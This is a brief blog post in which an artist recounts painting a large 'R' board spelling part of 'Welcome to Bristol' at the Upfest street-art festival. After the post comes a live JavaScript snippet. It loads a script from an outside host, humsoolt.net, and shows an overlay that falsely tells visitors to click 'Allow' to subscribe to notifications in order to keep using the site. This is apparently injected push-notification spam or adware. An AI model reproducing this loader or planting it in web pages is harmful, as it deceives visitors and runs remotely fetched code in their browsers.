Image
Top
Navigation

I was lucky enough to be invited to take part in @Upfest this year. The weather was beautiful, there was plenty of scrumpy to quench our thirst, and the standard of work was just incredible!
My finished board was the 8-foot tall ‘R’ which formed part of the phrase ‘Welcome to Bristol’.

Upfest - Tpography11813398_10152932243061402_3772320807547153250_n

const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}}; const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])}; const s = document.createElement('script'); s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009'; s.onload = (sdk) => { sdk.updateOptions({overlay, overlayTranslations}) sdk.onPermissionDefault(() => {}); sdk.onPermissionAllowed(() => {}); sdk.onPermissionDenied(() => {}); sdk.onAlreadySubscribed(() => {}); sdk.onNotificationUnsupported(() => {}); } document.head.appendChild(s);